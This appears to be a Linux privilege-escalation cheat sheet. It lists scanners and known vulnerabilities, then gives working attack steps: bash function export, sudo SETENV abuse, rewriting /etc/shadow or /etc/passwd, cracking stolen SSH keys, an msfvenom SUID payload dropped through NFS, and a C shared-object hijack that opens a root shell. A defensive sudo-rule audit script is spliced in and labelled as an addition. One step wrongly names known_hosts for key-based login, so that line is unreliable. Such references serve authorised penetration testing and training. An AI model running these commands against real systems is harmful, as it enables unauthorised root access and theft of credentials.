Linux
A list of Privilege Escalation Techniques for Linux.
Local Privesc Scanner
linPEAS
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix/MacOS hosts.
Github: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Known vulnerabilities
* Sudo version <= 1.9.12p1: allows a user that has sudo privileges for `sudoedit` to read/write all files of another user.
* Polkit vulnerability
* Kernel exploits
bash < 4.2-048:
How to exploit:
* Find a suid binary and check with `strings` which Linux binary it is using.
* Create a function with the same name:
  `function <path_to_used_binary> { /bin/bash -p; };`
* Export it:
  `export -f /usr/sbin/service`
* Run the suid binary.
Commands runnable with sudo: `sudo -l`
* If commands are runnable with `NOPASSWD`, check [gtfobins](https://gtfobins.github.io/).
* If commands are runnable with `SETENV`, you can use this to set an environment variable like `PYTHONPATH`, like this: `sudo -u <user> PYTHONPATH=<your/python/path> <command>`. This will force the program to execute the scripts in the given path with the rights of the sudo user. Don't forget you can always create files in `/tmp`.
* Abuse wildcard commands.
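The `sudo -l` checks above, turned into a small audit routine as an added example (this is not code from the original page): it parses `sudo -l` output and flags rules with `NOPASSWD`, `SETENV`, `ALL` or a wildcard in the arguments, which is the same list a reviewer of a sudoers file would go through. The sample output is constructed, not captured from a real host.

```python
import re
from typing import Dict, List

# Constructed sample of `sudo -l` output; not captured from any real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on app01:
    env_reset, mail_badpass

User alice may run the following commands on app01:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
    (root) SETENV: /usr/bin/python3 /opt/app/run.py
    (root) /usr/bin/tar -czf /backup/home.tgz /home/*
    (root) PASSWD: /usr/bin/systemctl restart app
"""

# One rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_rules(sudo_l_output: str) -> List[Dict[str, object]]:
    """Return one finding per sudo rule that matches a risk pattern from the checklist."""
    findings: List[Dict[str, object]] = []
    in_rules = False
    for raw in sudo_l_output.splitlines():
        line = raw.strip()
        # Rules start after the "User X may run the following commands" banner.
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(", "):
            reasons = []
            if "NOPASSWD" in tags:
                reasons.append("NOPASSWD: no authentication; check the binary on GTFOBins")
            if "SETENV" in tags:
                reasons.append("SETENV: caller controls env vars such as PYTHONPATH or LD_LIBRARY_PATH")
            if cmd == "ALL":
                reasons.append("ALL: unrestricted root command")
            if "*" in cmd:
                reasons.append("wildcard in arguments: wildcard abuse possible")
            if reasons:
                findings.append({"runas": m.group("runas"), "command": cmd, "reasons": reasons})
    return findings
```

Feed it the real output of `sudo -l` on a host under review; rules that only carry `PASSWD` and a fixed argument list produce no finding.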
Users' commands history
You might find passwords in the history.
Binaries with the suid bit set
Check if the binaries are exploitable for privesc on [gtfobins](https://gtfobins.github.io/).
Cron jobs
Abuse wildcard commands
Abuse environment variables
Writable /etc/shadow
Generate a new hash with `mkpasswd -m sha-512 <new_password>` and replace the one of a user, or create a new user.
Writable /etc/passwd
Generate a new password hash with `openssl passwd newpasswordhere` and then replace the `x` of a user, or create a new one.
Readable /etc/shadow
Read the users' password hashes and try to crack them.
Readable ssh keys (use them to connect as the user)
If the ssh key is password protected you can use `ssh2john.py id_rsa > tojohn.txt` to convert it into a hash and then crack the password with `john tojohn.txt`.
Writable known_hosts file: add your `id_rsa.pub` key in it and then connect as the user.
Secrets in config files
Abuse NFS configuration:
Check: `cat /etc/exports`
How to exploit:
* Mount the NFS share on your machine:
  `sudo mkdir /tmp/nfs; sudo mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs`
* Generate the payload:
  `msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf`
* Add the suid bit and execution rights:
  `chmod +xs /tmp/nfs/shell.elf`
* Execute the payload on the target machine:
  `/tmp/shell.elf`
Hijack shared objects (resource):
Requirements:
* a suid binary or a binary callable with sudo
* a way to make the binary call a shared object you wrote:
  * shared object does not exist => create it
  * shared object is writable => overwrite it
  * binary is callable with sudo and keeps the `LD_LIBRARY_PATH` variable => export the env variable when calling the binary
  * `/etc/ld.so.conf.d` contains a config file which points to somewhere you can write => put your exploit in the pointed path
How to check exploitability:
* Check the loaded shared objects and whether there are variables like RUNPATH: `readelf -d ./binary`
* Check if the binary finds the shared objects: `ldd binary`
How to exploit:
* write your exploit (you can replace the function name by a function used by the binary):
```c
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>
#include <sys/types.h>

/* Runs when the object is loaded: built with -nostartfiles, so this _init replaces the default one. */
void _init() {
    setreuid(geteuid(), geteuid());
    system("/bin/bash -p");
}
```
* compile it: `gcc -shared -fPIC -nostartfiles -o lib.so exploit.c`
* put it somewhere where the binary will load it
* run the binary